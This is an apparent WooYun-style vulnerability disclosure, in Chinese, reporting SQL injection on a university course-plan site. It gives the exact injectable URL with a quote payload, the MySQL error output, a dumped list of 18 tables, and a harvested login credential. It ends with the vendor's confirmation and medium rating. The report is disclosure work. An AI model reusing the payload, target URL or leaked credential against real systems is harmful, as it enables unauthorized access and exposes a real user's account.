漏洞详情

披露状态:

2014-03-30: 细节已通知厂商并且等待厂商处理中
2014-03-31: 厂商已经确认,细节仅向厂商公开
2014-04-10: 细节向核心白帽子及相关领域专家公开
2014-04-20: 细节向普通白帽子公开
2014-04-30: 细节向实习白帽子公开
2014-05-14: 细节向公众公开

简要描述:

某处过滤不当导致的sql注入,学分刷起来!

详细说明:

访问:

http://unitown.scnu.edu.cn/ShowMTeachPlanList.php?SelectType=coll&Depart_coll=%B9%E3%B6%AB%CD%E2%D3%EF%CD%E2%C3%B3%B4%F3%D1%A7%%27



错误信息:

mySQL 查询错误: SELECT Zhy.DepartID, Zhy.Zhy_Code, Department.Depart_coll, Department.Depart_major  FROM Zhy , Department WHERE Zhy.DepartID = Department.DepartID  AND Department.Depart_coll ='广东外语外贸大学%''

mySQL 发生错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''广东外语外贸大学%''' at line 1
mySQL 错误代码: 1064
时间: Sunday 30th 2014f March 2014 11:34:48 AM





刷一下表结构



[18 tables]
+---------------------------------------+
| News |
| user |
| course |
| course_recepter |
| course_resourse |
| coursevaild |
| department |
| error |
| excellentcourse |
| majorcode |
| mcteachplan |
| mcteachplanarrangement |
| noteinfo |
| receive |
| selcourse |
| studentinfo |
| systemrecord |
| zhy |
+---------------------------------------+





首页就有登陆入口,整一条user记录,登陆一下

lihh pwd:lihh



如图:

QQ20140330-26.jpg

漏洞证明:

首页就有登陆入口,整一条user记录,登陆一下

lihh pwd:lihh



如图:

QQ20140330-26.jpg

修复方案:

版权声明:转载请注明来源 IT P民@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-03-31 18:02

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现,典型的SQL注射漏洞,能被进一步利用,危害性较大.
影响的数据:中
攻击成本:低
造成影响:中
综合评级为:中,rank:8
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价: